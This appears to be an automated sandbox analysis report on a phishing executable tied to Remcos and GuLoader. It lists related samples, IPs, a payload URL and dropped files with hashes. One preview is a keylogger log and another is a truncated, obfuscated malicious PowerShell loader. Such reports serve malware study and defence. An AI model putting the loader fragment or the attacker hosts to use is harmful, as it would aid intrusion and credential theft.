                                                                          • VT rate limit hit for: order CF08093-24.exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          07:50:56API Interceptor36x Sleep call for process: powershell.exe modified
                                                                          07:53:28API Interceptor2226518x Sleep call for process: msiexec.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          212.162.149.89PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.89/KSMZNlmay152.bin
                                                                          178.237.33.50matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • geoplugin.net/json.gp
                                                                          WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • geoplugin.net/json.gp
                                                                          IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          geoplugin.netmatchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 178.237.33.50
                                                                          WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          UNREAL-SERVERSUSPO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.89
                                                                          la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 162.251.123.175
                                                                          file.exeGet hashmaliciousRedLineBrowse
                                                                          • 212.162.149.48
                                                                          https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                          • 172.96.10.214
                                                                          scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 162.251.122.87
                                                                          1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 212.162.149.63
                                                                          purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.66
                                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                                          • 212.162.149.128
                                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                                          • 212.162.149.128
                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                          • 162.251.122.86
                                                                          ATOM86-ASATOM86NLmatchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 178.237.33.50
                                                                          WgGo0xd2p8.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          UNREAL-SERVERSUSPO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.89
                                                                          la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 162.251.123.175
                                                                          file.exeGet hashmaliciousRedLineBrowse
                                                                          • 212.162.149.48
                                                                          https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                          • 172.96.10.214
                                                                          scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 162.251.122.87
                                                                          1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 212.162.149.63
                                                                          purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.66
                                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                                          • 212.162.149.128
                                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                                          • 212.162.149.128
                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                          • 162.251.122.86

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\ProgramData\remcos\logs.dat

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):144
                                                                          Entropy (8bit):3.379519383183141
                                                                          Encrypted:false
                                                                          SSDEEP:3:rhlKlyKOlfVlY1rQ55JWRal2Jl+7R0DAlBG45klovDl6v:6lZ6wE55YcIeeDAlOWAv
                                                                          MD5:52FCA61BFA0B27DF01FB1B0C3B45566B
                                                                          SHA1:0FE4F2057102555F31C29FB2731BDA366DBA7BA7
                                                                          SHA-256:984501B19005C2077AB249265F084072DA265ED68840C95A068348EA5CDC7CE2
                                                                          SHA-512:82413C7DBFAD06A4608ABFF1350B9BF9005EB978444AE2E445B45DFD9DBA5AFFDAE23C0586C0AD3FE91A78A6DFB270758A43EFF9E18F8C72EB28A6693CFDAAFB
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                          Preview:....[.2.0.2.4./.1.2./.1.0. .0.7.:.5.2.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):963
                                                                          Entropy (8bit):5.014252336516381
                                                                          Encrypted:false
                                                                          SSDEEP:12:tkluand66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluWdbauKyGX85jvXhNlT3/7CcVKWro
                                                                          MD5:41AED8C7FD9535846FF1B201970579A9
                                                                          SHA1:670A7F736F7571C2584484D52552D408CD890A56
                                                                          SHA-256:F4379452004FC2CFE9D69CE016752E7A84725BD2FBF7AE0E74B6006FABE9F6E8
                                                                          SHA-512:C71EFACE69AE6B28D6A1A7BCBCDB7A6C914C24D43197F5F989B20A2BE4670C6BB8381A4EB3847EBA2DF5C3F8BE5229ADE4FB787811DA493ECDCCD82934F144B9
                                                                          Malicious:false
                                                                          Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):53158
                                                                          Entropy (8bit):5.062687652912555
                                                                          Encrypted:false
                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bilparkens.Ove29

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):337055
                                                                          Entropy (8bit):7.544579077242849
                                                                          Encrypted:false
                                                                          SSDEEP:6144:JEUDPRUsb3DU2wAnFXW2Nuq9L2mCAi0tLjeXCSpjLav/UI8gpC3EWb:+UDPRUsb3DU/AnFX1omLi0p2RjLmU3n
                                                                          MD5:68CFD8ADF719F2AAA219619517D340CE
                                                                          SHA1:60D5E29BD910601140514CEE1BC910783DD7B42D
                                                                          SHA-256:1BD4455B45488BD56E2D03216DD4657A491420A8485E64465E535F65B689E637
                                                                          SHA-512:65E50EC049D32963C0EEE4B0D75C182851005E60A7F29EE2ABD29158DAE8A99A64CCB075B09E158235FB14CE5F5FEFC0D47288139A3F4210E0848EF8C6F9F9DF
                                                                          Malicious:false
                                                                          Preview:../..........j....u..........555...|.......................N...............>>.......................v..............................O..GG.....S...C......00000.......r.....................]]].......""".....................M....xx...................GGGG..............M...............................................||.............................eeeeee..............YY.......z.e...}}}.j......................................]]]...........--............o.<<......||...............GGG.............t.....(....K.......11........S..........;...............[....%%%%..............8.............@.............*........................r..............nn.......R............}}.P......................m............ss..EE..........i................v..i........444..............MMMMMM.....................VV..ccc........._.........N......^^..........{..................<<<.rrr.]]]..ii....77.........LLLL.????...................iiii....++....................b....F......=..RRR.vv..................................LLL.

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4183), with CRLF, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):71796
                                                                          Entropy (8bit):5.191116919117427
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yKsCYe5OPPiGvzoHuvt3qVUZfzdQoxWNhNewPgBm7/r58bCNv:yKsCh5U6qoHu8UZioxWxkBL0
                                                                          MD5:3B20C84EC4ACD7434FB636891C50B86F
                                                                          SHA1:6041D9F3074B6C0F3E854F96F0C24ACE5A7C281A
                                                                          SHA-256:144E6127E852E3EF90CBAA8E7D5CE3084B709BD812A8E29A176A35FADD6F92C7
                                                                          SHA-512:18AE28BB00AEBB403C9AB57C777AD149093C33AA3E1BC23F96F7425B66AC50274E50E505B0AC1C53A931A133F9F7F2A650954316E2411E027E37988B1ED2A834
                                                                          Malicious:true
                                                                          Preview:$Unrhymed=$Unweelness;........$Unpremeditation = @'.Vrne er. etzdai$Ni.iassSRamro spMorasswo.ladvogn SanmartSt.nzenoSjl,navoBetry gnIsflagesNedko s=Ma,roma$UrologiGVolutoimIslndine Skels.lLeptoneiA svalnnOndskaba QuadrafKukuragsEntellua ensigtldicetyltfeuda eeRets al;Reg.eam.VibrantfmiljadmuCitron n Chef,scP rsonbt.ivulgaiO talkooej ndomnronkedo FuldfaRFravaere andskooDeltidsxpandehuiHellasedPalletiiAeolistsAmtsraaeempemats slippe fl,vegl(spiseol$treleddGRanermumKnobbereMaliasal CaimitiEpidermnFrimrkeaKarr ts, Pikt.g$MalfeasG Livsfom ImposeeN ncorrl OmkraniWordenmn WhelpaaAnciennf.reankobAmbul,noBowditceFisca ljPruinos) sjufte Psykolo{ Sammen.Brn sto.Voliere$S btropG Con airOsmat oe .acertyUdlejeihKaldtesewarrensnTraneda Saxofon( KlausiZAporia oCentralbI dlevel VelligePaadmmerSl mpennBes utneOsakale Brugerk'sporsspMIndusiai OpstilnEpithelihjemfarvLgtningeUdla nsrpat,rfa$Skumbad Dim ttT Efterae OmbejlsrivellstTrfod r SpatiaiUnde.tnGunstuff overnouoSkarn avPsaltere f riemrgalipoir Fu

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\acology.mar

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):437071
                                                                          Entropy (8bit):1.253825384833456
                                                                          Encrypted:false
                                                                          SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                                                          MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                                                          SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                                                          SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                                                          SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                                                          Malicious:false
                                                                          Preview:.....................................X....................................>..a......................A......w..............................@.y........K..............................................z...................z...........p............V.....................................................h....................|..U.........../................................................................O..+.............................................+................F....................................2......................J..........................".........................A.............................-..............G..............S...............V.............t.......=.....................b.............................................................................................................................................................w................3........f.................2.........................m.0.........................................q...............................

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):794991
                                                                          Entropy (8bit):7.828214989600231
                                                                          Encrypted:false
                                                                          SSDEEP:24576:UXqzrTlCjH1awESBysQiaQtrxE0lmB4QT31V1how/:WKcj8SnQiaQU0lmB4S3H1H
                                                                          MD5:19C071AE3E499DF299092283E301B7A2
                                                                          SHA1:711E76279688465F62FD3DE93BA05328393439CD
                                                                          SHA-256:EDC42C5E0E81B4E0598F17CF43AD139E934E32E2538C97811E3B995FA139199F
                                                                          SHA-512:7B59E6918084D752E73B329E0BA201C65177BBE5239AB725D6906823B3BDF3D7299C0F6517312CA7F54A1ACC5FEFADF1F2E8551CD511F38CEA3B889C8A1BA187
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\straffesager.tra

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):484281
                                                                          Entropy (8bit):1.2585657408825282
                                                                          Encrypted:false
                                                                          SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                                                          MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                                                          SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                                                          SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                                                          SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                                                          Malicious:false
                                                                          Preview:.............................................................................[....2...........W......A.................S........y.................................................................4.......D...=...............Y......................".............................................................7............................................................................Y.....................................{........{.....>................m.....................................`...................................r...............................?.....#...............8.?.....................................................-..........\....................................................%:.................................p.................{.......r.............u..m...b...........................<.........................................................................1...............................................S.............................................4.............W....

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\tallness.ber

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):493903
                                                                          Entropy (8bit):1.2514017425028907
                                                                          Encrypted:false
                                                                          SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                                                          MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                                                          SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                                                          SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                                                          SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                                                          Malicious:false
                                                                          Preview:..Zy..........................................V......................k...................g........./.............Q.........l..#.....^............................................x..........&.............................../................................................................./............/.........................).......?......................p.............o..........................................sy............................................................5.........................R2...................................................................................................."e..............................................Y..................................................l.......{................s...............................................9..........................d.........&.......r......................<..........................................................................................................?............*..................L.................

                                                                          C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\vaklende.sna

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):340924
                                                                          Entropy (8bit):1.2553271369192232
                                                                          Encrypted:false
                                                                          SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                                                          MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                                                          SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                                                          SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                                                          SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                                                          Malicious:false
                                                                          Preview:......................j..h....!..............................................p.............c....P............................k......................................y...............o`....................}...'9...........................Gt......................P.............................................................'.................................#.......................!.............................................................................................W.....C..........................................................................U...g......................................H.....s............n........U........)..........................................s.........S.................t......................................M.................................................................................S.............................................................H........................).............c.$...... .....................n.....................................

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zigzoer.fjd.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lmwpe1h.pwi.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kaqhdhjh.k1h.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mq0o1qiw.ssz.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\bhvA9CA.tmp

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):15728640
                                                                          Entropy (8bit):0.10106922760070924
                                                                          Encrypted:false
                                                                          SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                          MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                          SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                          SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                          SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                          Malicious:false
                                                                          Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf

                                                                          Download File
